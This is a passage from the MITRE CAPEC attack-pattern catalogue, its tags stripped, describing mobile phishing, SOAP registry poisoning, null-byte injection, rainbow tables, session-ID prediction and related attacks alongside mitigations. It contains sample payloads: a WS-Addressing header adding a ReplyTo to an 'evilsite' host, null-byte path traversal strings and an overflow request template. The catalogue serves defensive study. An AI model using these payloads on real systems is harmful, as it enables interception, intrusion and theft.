Tongbo Luo Hao Hao Wenliang Du Yifei Wang Heng Yin Attacks on WebView in the Android System Annual Computer Security Applications Conference (ACSAC) 2011 http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf CAPEC Content Team MITRE 2014-02-06 An adversary, through a previously installed malicious application, monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred. The only known mitigation to this attack is to avoid installing the malicious application on the device. However, the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help. 1000 Attack Pattern ChildOf 173 Adrienne Porter Felt David Wagner Phishing on Mobile Devices 4.1.2 Man-In-The-Middle University of California, Berkeley 2011 http://www.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf CAPEC Content Team MITRE 2014-02-06 An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application. The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible. 1000 Attack Pattern ChildOf 173 Adrienne Porter Felt David Wagner Phishing on Mobile Devices 4.1.2 Man-In-The-Middle University of California, Berkeley 2011 http://www.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf CAPEC Content Team MITRE 2014-02-06 SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata (to effect a denial of service), and delete information about service provider interfaces. WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. The attacker that can rewrite WS-addressing information gains the ability to route service requesters to any service providers, and the ability to route service provider response to any service. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol. The basic flow for the attacker consists of either altering the data at rest in the registry or uploading malicious content by spoofing a service provider. The service requester is then redirected to send its requests and/or responses to services the attacker controls. The attacker must be able to write to resources or redirect access to the service registry. Very High High Modification of Resources Injection Protocol Manipulation WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime. <S:Header> <wsa:MessageID> http://example.com/Message </wsa:MessageID> <wsa:ReplyTo> <wsa:Address>http://valid.example/validClient</wsa:Address> </wsa:ReplyTo> <wsa:ReplyTo> <wsa:Address>http://evilsite/evilClient</wsa:Address> </wsa:ReplyTo> <wsa:FaultTo> <wsa:Address>http://validfaults.example/ErrorHandler</wsa:Address> </wsa:FaultTo> </S:Header> In this example "evilsite" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with REpolyTo header it will not generate a Soap fault. Low To identify and execute against an over-privileged system interface Capability to directly or indirectly modify registry resources Design: Enforce principle of least privilege Design: Harden registry server and file access permissions Implementation: Implement communications to and from the registry using secure protocols Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read application data Integrity Modify application data Payload delivered through standard communication protocols, such as UDDI or WS-Addressing. Command(s) executed directly on service requester, in the case of redirect, or on the service provider, in the case of the additional replyto attack. Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 285 Targeted 74 Targeted 693 Targeted 1000 Attack Pattern ChildOf 269 Exploitation High High High SOA All All All Gunnar Peterson 2007-02-28 Gunnar Peterson 2007-02-28 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, Payload An attacker embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s). Identify a place in the program where user input may be used to escalate privileges by for instance accessing unauthorized file system resources through directory browsing. An attacker realizes that there is a postfix data that gets in the way of getting to the desired resources An attacker then ads a postfix NULL terminator to the supplied input in order to "swallow" the postfixed data when the insertion is taking place. With the postfix data that got in the way of the attack gone, the doors are opened for accessing the desired resources. The program does not properly handle postfix NULL terminators High High Injection Modification of Resources API Abuse Directory Browsing Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an attacker could insert a bogus username such as ../../../../../WINDOWS. If the attacker needs to remove the trailing string /reports, then he can simply insert enough characters so the string is truncated. Alternatively the attacker might apply the postfix NULL character (%00) to determine whether this terminates the string. Different forms of NULL to think about include PATH%00 PATH[0x00] PATH[alternate representation of NULL character] <script></script>%00 Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote attackers to execute arbitrary code. The problem specifically exists upon retrieving a link of the following form: GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1 Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a "file not found" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an attacker to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here: 0x77F83AE5 MOV EAX,[EDI+8] 0x77F83AE8 MOV ECX,[EDI+C] ... 0x77F83AED MOV [ECX],EAX The register EDI contains a pointer to a user-supplied string. The attacker therefore has control over both the ECX and EAX registers used in the shown MOV instruction. Successful exploitation allows remote attackers to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat. An attacker does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script. Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [R.52.2]. CVE-2004-0629 Consider the following PHP script: $whatever = addslashes($_REQUEST['whatever']); include("/path/to/program/" . $whatever . "/header.htm"); A malicious attacker might open the following URL, disclosing the boot.ini file: http://localhost/phpscript.php?whatever=../../../../boot.ini%00 Medium Directory traversal High Execution of arbitrary code Properly handle the NULL characters supplied as part of user input prior to doing anything with the data. Integrity Modify application data Confidentiality Read memory Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 158 Targeted 172 Targeted 173 Targeted 171 Targeted 74 Targeted 20 Targeted 697 Targeted 707 Targeted 1000 Attack Pattern ChildOf 267 333 Category HasMember 361 Reluctance to Trust Penetration Exploitation High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Adobe Acrobat/Acrobat Reader ActiveX Control Buffer Overflow Vulnerability iDefense Labs Public Advisory Verisign, Inc. August 13, 2004 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=126 PHP Input Validation Vulnerabilities Bugtraq mailing list archive http://msgs.securepoint.com/bugtraq/ [R.52.1][REF-2] Cigital, Inc 2007-03-01 [R.52.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Context Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Context Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an attacker to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used. An attacker first probes to figure out what restrictions on input are placed by filter, such as a specific characters on the end of the URL. The attacker then injects a string of their choosing with a null terminator (using an alternate encoding such as %00), followed by a backslash (%5C), followed by some additional characters that are required to keep the filter happy The malicious string then passes through the filter and passed to the underlying API. Everything after the null terminator is ignored. This may give an attacker the opportunity to access file system resources to which they should not have access and do other things. Some popular forms in which this takes place: PATH%00%5C PATH[0x00][0x5C] PATH[alternate encoding of the NULL][additional characters required to pass filter] Null terminators are not properly handled by the filter. High High Injection A rather simple injection is possible in a URL: http://getAccessHostname/sekbin/ helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here] [%00][%5C]&chapter= This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered. Medium An attacker needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API Test the program with various inputs and observe the behavior of the filter. Overtime it should be possible to understand what the filter is expecting. Null characters are observed by the filter. The filter needs to be able to understand various encodings of the Null character, or only canonical data should be passed to it. Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Integrity Modify application data Confidentiality Read memory Confidentiality Access_Control Authorization Gain privileges / assume identity 158 Targeted 172 Targeted 173 Targeted 171 Targeted 74 Targeted 20 Targeted 697 Targeted 707 Targeted 1000 Attack Pattern ChildOf 52 1000 Attack Pattern ChildOf 267 Reluctance to Trust Penetration High High Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.53.1][REF-2] Cigital, Inc 2007-03-01 [R.53.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary An Attacker, aware of an application's location (and possibly authorized to use the application) can probe the application's structure and evaluate its robustness by probing its error conditions (not unlike one would during a 'fuzz' test, but more purposefully here) in order to support attacks such as blind SQL injection, or for the more general task of mapping the application to mount another subsequent attack. Determine user-controllable parameters of the application Inject each parameter with content that causes an error condition to manifest Modify the content of each parameter according to observed error conditions Repeat above steps with enough parameters until the application has been sufficiently mapped out to launch desired attack (for example, Blind SQL Injection) This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities. Low High Injection Brute Force Blind SQL injection is an example of this technique, applied to successful exploit. CVE-2006-4705 Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality. In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them. Medium Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design. The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the attacker. The Attack does not need special hardware, software, skills, or access. Repeated errors generated by the same piece of code are an indication, although it requires careful monitoring of the application and its associated error logs, if any. To defeat correlation, the attacker may try changing the origin IP addresses or client browser identification strings or start a new session from where he left off; any technique aimed at defeating the use of certain identification parameters for correlation goes a small way in obfuscating the attack. Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally. Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion. Confidentiality Read application data Read memory User-controllable input Content, based on application context, crafted to elicit error conditions from the application Error Handling mechanism within the application The impact of activation is an error condition that, hopefully for the attacker, reveals sufficient information to further map the application. 209 Targeted 248 Secondary 717 Targeted 1000 Category ChildOf 210 1000 Attack Pattern ChildOf 116 Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database. Employ application-level safeguards to filter data and handle exceptions gracefully. Failing Securely Defense in Depth Never Use Input as Part of a Directive to any Internal Component Handle All Errors Safely Reconnaissance Medium Medium Low All All All All Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Common Weakness Enumeration (CWE) CWE-390 - Improper Error Handling Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/390.html John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations An attacker gets access to the database table where hashes of passwords are stored. He then uses a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system. A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt. Determine application's/system's password policy Determine the password policies of the target application/system. Determine minimum and maximum allowed password lengths. env-All Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.). env-All Determine account lockout policy (a strict account lockout policy will prevent brute force attacks). env-All Passwords are used in the application/system env-All Passwords are not used in the application/system env-All Obtain password hashes An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password. Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.) env-All Obtain password hashes from platform-specific storage locations (e.g. Windows registry) env-All Sniff network packets containing password hashes. env-Web env-Peer2Peer env-ClientServer env-CommProtocol Password authentication not used in application/system. env-All At least one (unsalted) password hash obtained. No password hashes obtained by attacker. Run rainbow table-based password cracking tool An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system. Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy. env-All Success outcome in step 2. env-All Failure outcome in step 2. env-All A password corresponding to the hash recovered. Password corresponding to the hash could not be recovered with the given rainbow table. Include salts in hashes. Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table. Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations). The system uses one factor password based authentication. Medium Medium Brute Force BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. CVE-2006-1058 Low A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place. Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required. This is a completely offline attack that an attacker can perform at their leisure after the password hashes are obtained. Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it. Confidentiality Access_Control Authorization Gain privileges / assume identity 261 Targeted 521 Targeted 262 Secondary 263 Secondary 693 Targeted 719 Secondary 1000 Attack Pattern ChildOf 49 Penetration High High Low All All All All Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Description Summary, Indicators-Warnings_of_Attack Attackers can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. The attack may involve gaining access to and calling protected functionality (or accessing protected data) directly, may involve subverting some aspect of the guard's implementation, or outright removal of the guard, if possible. The attacker determines, through brute-forcing, reverse-engineering or other similar means, the location and logic of the guard element The attacker then tries to determine the mechanism to circumvent the guard. Once the mechanism has been determined, the attacker proceeds to access the protected functionality The Attacker must have reverse-engineered the application and its design extensively enough to have determined that a guard element exists. This may have been done as simply as through probing (and likely receiving too verbose an error message) or could have involved high-brow techniques supported by advanced reverse engineering/debugging tools. Very High Medium Attacker uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the Attacker directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks). Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary. Medium The attacker must ability to understand complex design logic as well as possibly the ability to reverse-engineer the design and code to determine placement and logic of guard element. The attacker needs the ability to explore the application's functionality and response to various conditions. In cases where the guard component sits server-side, the attacker will likely require a valid login. In the case that guard functionality exists client-side, the attacker will likely require reverse-engineering tools, such as a disassembler. Attackers may confine (and succeed with) probing as simple as exploring an application's functionality and its underlying mapping to server-side components. It is likely that for this to succeed, the Attacker will need a valid login. At the other extreme, Attackers capable of reverse engineering client code will have the ability to remove functionality or identify the whereabouts of sensitive data through white box analysis, such as review of reverse-engineered code. Confidentiality Access_Control Authorization Bypass protection mechanism Confidentiality Read memory Integrity Modify memory 288 Targeted 372 Secondary 510 Targeted 693 Targeted 721 Targeted CVE-2007-0968 Unspecified vulnerability in Cisco Firewall Services Module (FWSM) before 2.3(4.7) and 3.x before 3.1(3.1) causes the access control entries (ACE) in an ACL to be improperly evaluated, which allows remote authenticated users to bypass intended certain ACL protections. CVE-2007-0802 Mozilla Firefox 2.0.0.1 allows remote attackers to bypass the Phishing Protection mechanism by adding certain characters to the end of the domain name, as demonstrated by the "." and "/" characters, which is not caught by the Phishing List blacklist filter. VU#258834 WebEOC ties privileges and roles to client-side resources. If an attacker can access a resource directly, that attacker will be granted all the privileges associated with that resource. 1000 Attack Pattern ChildOf 207 Defense in Depth Complete Mediation Failing Securely Use Authentication Mechanisms, Where Appropriate, Correctly Use Authorization Mechanisms Correctly Penetration High High Low All All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to place man in the middle once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme. Opportunity to intercept must exist beyond the point where SSL is terminated. The attacker must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path. Very High Medium Protocol Manipulation Injection The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the attacker can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack. Low To insert a network sniffer or other listener into the communication stream Attacker may use a network sniffer to identify authentication credentials once SSL is terminated. Implementation: Implement message level security such as HMAC in the HTTP communication Design: Utilize defense in depth, do not rely on a single security mechanism like SSL Design: Enforce principle of least privilege Confidentiality Access_Control Authorization Gain privileges / assume identity HTTP protocol communications Command(s) executed directly on host Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 300 Targeted 287 Targeted 724 Targeted 693 Targeted 1000 Attack Pattern ChildOf 94 Penetration Exploitation High High High SOA All All All Gunnar Peterson 2007-02-28 Gunnar Peterson 2007-02-28 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Attack Prerequisites Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Attack Prerequisites Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Description Summary Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server. The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete. High High Injection The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state. Low It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface Attacker may enumerate URLs to identify vulnerable services. Design: Enforce principle of least privilege Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity Payload delivered through standard communication protocols. In the Flickr and del.icio.us examples above, this is done through a normal web browser Command(s) executed directly on host Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 267 Targeted 269 Targeted 264 Targeted 1000 Attack Pattern ChildOf 1 1000 Category ChildOf 233 Penetration Exploitation High High Low SOA All All All Mark O'Neill Security for REST Web Services Vprde; http://www.vordel.com/downloads/rsa_conf_2006.pdf Gunnar Peterson 2007-02-28 Gunnar Peterson 2007-02-28 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Solutions_and_Mitigations This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking. Find Session IDs The attacker interacts with the target host and finds that session IDs are used to authenticate users. An attacker makes many anonymous connections and records the session IDs assigned. env-Web env-Peer2Peer env-CommProtocol env-ClientServer An attacker makes authorized connections and records the session tokens or credentials issued. env-Web env-Peer2Peer env-CommProtocol env-ClientServer Web applications use session IDs env-Web Network systems issue session IDs or connection IDs env-CommProtocol env-ClientServer env-Peer2Peer Monitor logs for unusual amounts of invalid sessions. Monitor logs for unusual amounts of invalid connections or invalid requests from unauthorized hosts. Characterize IDs The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable. Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs env-Web env-ClientServer env-Peer2Peer env-CommProtocol Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Patterns are detectable in session IDs Session IDs pass NIST FIPS 140 statistical tests for cryptographic randomness. Session IDs are repeated. Match issued IDs The attacker brute forces different values of session ID and manages to predict a valid session ID. The attacker models the session ID algorithm enough to produce a compatible series os IDs, or just one match. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Session identifiers successfully spoofed No session IDs can be found or exploited Use matched Session ID The attacker uses the falsified session ID to access the target system. The attacker loads the session ID into his web browser and browses to restricted data or functionality. env-Web The attacker loads the session ID into his network communications and impersonates a legitimate user to gain access to data or functionality. env-CommProtocol env-Peer2Peer env-ClientServer Monitor the correlation between session IDs and other station designations (MAC address, IP address, VLAN, etc.). Alert on session ID reuse from multiple sources. Terminate both sessions if an ID is used from multiple origins. The target host uses session IDs to keep track of the users. Session IDs are used to control access to resources. The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time). High High Spoofing Brute Force Analysis Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. CVE-2006-6969 mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. CVE-2001-1534 Low There are tools to brute force session ID. Those tools require a low level of knowledge. Medium Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis. The attacker can perform analysis of the randomness of the session generation algorithm. The attacker may need to steal a few valid session IDs using a different type of attack. And then use those session ID to predict the following ones. The attacker can use brute force tools to find a valid session ID. Use a strong source of randomness to generate a session ID. Use adequate length session IDs Do not use information available to the user in order to generate session ID (e.g., time). Ideas for creating random numbers are offered by Eastlake [RFC1750] Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format. Confidentiality Access_Control Authorization Gain privileges / assume identity 290 Targeted 330 Targeted 331 Targeted 346 Targeted 488 Secondary 539 Secondary 200 Secondary 6 Targeted 285 Secondary 384 Secondary 693 Targeted 719 Secondary 1000 Attack Pattern ChildOf 196 333 Category HasMember 351 Securing the Weakest Link Penetration High High Low Client-Server J2EE .NET All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Eric Dalci Cigital, Inc 2007-01-25 Eric Dalci Cigital, Inc 2007-01-25 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Sean Barnum Cigital, Inc 2007-03-07 Review and revise CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Probing_Techniques An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated 